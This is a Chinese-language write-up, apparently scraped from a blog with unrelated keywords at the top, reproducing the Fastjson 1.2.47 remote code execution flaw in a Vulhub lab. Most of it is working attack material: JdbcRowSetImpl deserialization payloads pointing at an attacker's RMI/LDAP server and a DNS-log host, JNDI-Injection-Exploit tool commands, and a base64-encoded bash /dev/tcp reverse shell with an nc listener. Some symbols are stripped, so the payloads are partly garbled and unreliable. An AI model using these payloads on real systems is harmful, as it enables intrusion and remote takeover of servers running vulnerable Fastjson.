公司网站恶意评价,小制作废品利用,贵阳市建设局地址网站,ios应用开发语言感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞检测3、漏洞验证 1.5、深度利用1、反弹Shell 说明内容漏洞编号漏洞名称Fastjson_1.2.47_远程执行漏… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞检测3、漏洞验证 1.5、深度利用1、反弹Shell 说明内容漏洞编号漏洞名称Fastjson_1.2.47_远程执行漏洞漏洞评级影响范围漏洞描述修复方案
1.1、漏洞描述
Fastjson是阿里巴巴公司开源的一款json解析器其性能优越被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单而在1.2.48以前的版本中攻击者可以利用特殊构造的json字符串绕过白名单检测成功执行任意命令
1.2、漏洞等级
高危
1.3、影响版本
1.2.47
1.4、漏洞复现
1、基础环境
PathVulhub/fastjson/1.2.47-rce 启动测试环境
sudo docker-compose up -d访问http://your-ip:8090/即可看到一个json对象被返回 将content-type修改为application/json后可向其POST新的JSON对象后端会利用fastjson进行解析
发送测试数据
{name:hello, age:20}2、漏洞检测
使用BurpSuite扩展插件FastjsonScan进行漏洞检测 POC
{axin:{type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl},is:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:rmi://s0tgwxk05ll1qvmz0lwr27u0prvhj6.oastify.com/aaa,autoCommit:true}
}使用dnslog测试 3、漏洞验证
利用JNDI-Injection-Exploit工具开启RMI服务器
在/tmp目录下创建hello文件
┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/demo -A 192.168.80.141
[ADDRESS] 192.168.80.141
[COMMAND] touch /tmp/demo
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fuk3fq
ldap://192.168.80.141:1389/fuk3fq
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/slgipa
ldap://192.168.80.141:1389/slgipa
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8 or SpringBoot 1.2.x in classpath):
rmi://192.168.80.141:1099/zsjp7n----------------------------Server Log----------------------------
2023-09-08 03:53:56 [JETTYSERVER] Listening on 0.0.0.0:8180
2023-09-08 03:53:56 [RMISERVER] Listening on 0.0.0.0:1099
2023-09-08 03:53:57 [LDAPSERVER] Listening on 0.0.0.0:1389发送POC到FastJson服务器通过RMI协议远程加载恶意类
{axin:{type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl},is:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:rmi://192.168.80.141:1099/slgipa,autoCommit:true}
}进入docker容器内验证 1.5、深度利用
1、反弹Shell
构造反弹shell进行base64编码
bash -i /dev/tcp/192.168.80.141/1234 01bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDAJjE}|{base64,-d}|{bash,-i}监听1234端口
nc -lvp 1234开启RMI服务
┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDAJjE}|{base64,-d}|{bash,-i} -A 192.168.80.141
[ADDRESS] 192.168.80.141
[COMMAND] bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDAJjE}|{base64,-d}|{bash,-i}
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fd5cfs
ldap://192.168.80.141:1389/fd5cfs
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/flbdik
ldap://192.168.80.141:1389/flbdik
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8 or SpringBoot 1.2.x in classpath):
rmi://192.168.80.141:1099/m8yxp6----------------------------Server Log----------------------------
2023-09-08 04:02:36 [JETTYSERVER] Listening on 0.0.0.0:8180
2023-09-08 04:02:36 [RMISERVER] Listening on 0.0.0.0:1099
2023-09-08 04:02:36 [LDAPSERVER] Listening on 0.0.0.0:1389POC:
{axin:{type:java.lang.Class,val:com.sun.rowset.JdbcRowSetImpl},is:{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:ldap://192.168.80.141:1389/fd5cfs,autoCommit:true}
}获得Shell